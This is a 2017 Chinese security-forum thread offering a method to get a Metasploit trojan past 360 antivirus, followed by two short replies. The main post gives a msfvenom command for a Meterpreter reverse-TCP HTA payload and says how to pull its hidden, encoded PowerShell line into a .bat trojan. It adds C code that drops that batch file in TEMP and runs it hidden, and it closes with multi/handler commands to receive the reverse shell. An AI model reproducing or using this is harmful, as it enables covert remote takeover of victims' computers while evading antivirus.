查看: 284|回复: 2

[系统安全] kali过360

[复制链接]
  • TA的每日心情
    开心
    2017-11-2 11:20
  • 签到天数: 3 天

    连续签到: 1 天

    [LV.2]偶尔看看I

    发表于 2017-10-19 13:01:16 | 显示全部楼层 |阅读模式
    kali系统下hta
    msfvenom -p windows/meterpreter/reverse_tcp lhost=自己kali的ip lport=25644 -f hta-psh -o a.hta
    编辑hta文件
    找到
    powershell.exe -nop -w hidden -e aQB...................................................................这一段
    复制出来新建.bat文件,即可作为.bat木马
    如果会c++的话
    新建c语言项目在程序中加入函数
    void mkbat(char * command) {
            char file_name[11];
            char *str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
            for (int i = 0; i<10; i++) {
                    file_name = str[rand() % strlen(str)];
                    printf("key is:%c", file_name);
            };
            file_name[10] = '\0';
            char *windir;
            size_t len;

            _dupenv_s(&windir, &len, "TEMP");

            char *temp_path = (char*)malloc(120);
            memset(temp_path, 0, sizeof(temp_path));
            strcat_s(temp_path, strlen(temp_path) + strlen(windir) + 1, windir);
            strcat_s(temp_path, strlen(temp_path) + strlen("\\") + 1, "\\");
            int size = strlen(file_name);
            strcat_s(temp_path, strlen(temp_path) + strlen(file_name) + 1, file_name);
            strcat_s(temp_path, strlen(temp_path) + strlen(".bat") + 1, ".bat");
            puts(temp_path);
            FILE *file;
            int i = 0;
            if (fopen_s(&file, temp_path, "w") == 0) {
                    while (*command)
                    {
                            printf("%c", *command);
                            fseek(file, i++, SEEK_SET);
                            fprintf(file, "%c", *command++);
                    }
                    fclose(file);
                    getchar();
                    fflush(file);
            }
            char *c = temp_path;
            WinExec(c, SW_HIDE);
    }
    void execute_cmd() {
            char *command = "powershell.exe -nop -w hidden -e ............................................................
            mkbat(command);
    }
    执行
    execute_cmd();
    原理是提取windows中的环境变量TEMP,在系统临时文件夹(C:\Users\Administrator\AppData\Local\Temp)中生成.bat文件并执行,
    因为.bat执行Powershell是可以过360的


    编译即可生成exe木马,亲测可过360,2017/10/19日

    然后在kali系统下开启接受反弹shell
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp  
    set lhost 192.168.2.252
    set lport 1213
    exploit
    //还有怎么加图片。。
  • TA的每日心情

    2018-1-17 22:07
  • 签到天数: 21 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    发表于 2017-10-29 18:51:32 | 显示全部楼层
    顶起!!!
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-11-23 09:26
  • 签到天数: 13 天

    连续签到: 1 天

    [LV.3]偶尔看看II

    发表于 2017-11-10 10:02:48 | 显示全部楼层
    感觉好牛逼的样子 但是我看不懂。。
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    站长推荐上一条 /1 下一条